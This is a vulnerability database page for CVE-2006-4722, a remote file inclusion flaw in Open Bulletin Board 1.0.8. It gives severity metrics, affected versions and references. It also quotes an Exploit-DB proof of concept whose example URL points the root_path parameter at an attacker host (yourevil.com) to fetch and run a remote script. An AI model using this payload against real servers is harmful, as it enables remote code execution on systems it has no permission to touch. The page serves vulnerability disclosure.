CVE-2006-4722 : Detail

CVE-2006-4722

2.73%V4
Network
2006-09-12
14h00 +00:00
2018-10-17
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PHP remote file inclusion vulnerability in Open Bulletin Board (OpenBB) 1.0.8 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter to (1) index.php and possibly (2) collector.php.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2341

Publication date : 2006-09-09 22h00 +00:00
Author : Eddy_BAck0o
EDB Verified : Yes

+-------------------------------------------------------------------- + + Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: Open Bulletin Board 1.0.8 + Venedor ...........: http://www.openbb.com + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Discovered by ..........: Eddy_BAck0o + Contact ...........: l0x3[at]hotmail.com + +-------------------------------------------------------------------- +-------------------------------------------------------------------- + ./index Directory ... ~ [index.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + require $root_path . "base.php"; <--- 30 - 380 + require $root_path . "base.php"; <--- 46 - 380 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Ex --> http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cmd + +------------------------------------------------------------------- + ~ [collector.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + root_path = "./"; <--- 24 - 194 + require $root_path . "base.php"; <--- 159 - 194 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Ex --> http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cmd + +------------------------------------------------------------------- + Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ] ;.... +-------------------------------------------------------------------- +-------------------------------------------------------------------- # milw0rm.com [2006-09-10]

Products Mentioned

Configuraton 0

Openbb>>Openbb >> Version To (including) 1.0.8

Openbb>>Openbb >> Version 1.0.0_beta1

    Openbb>>Openbb >> Version 1.0.0_rc1

      Openbb>>Openbb >> Version 1.0.0_rc2

        Openbb>>Openbb >> Version 1.0.0_rc3

          Openbb>>Openbb >> Version 1.0.5

            Openbb>>Openbb >> Version 1.0.6

            References

            http://www.securityfocus.com/bid/19937
            Tags : vdb-entry, x_refsource_BID
            http://www.vupen.com/english/advisories/2006/3546
            Tags : vdb-entry, x_refsource_VUPEN
            http://securityreason.com/securityalert/1552
            Tags : third-party-advisory, x_refsource_SREASON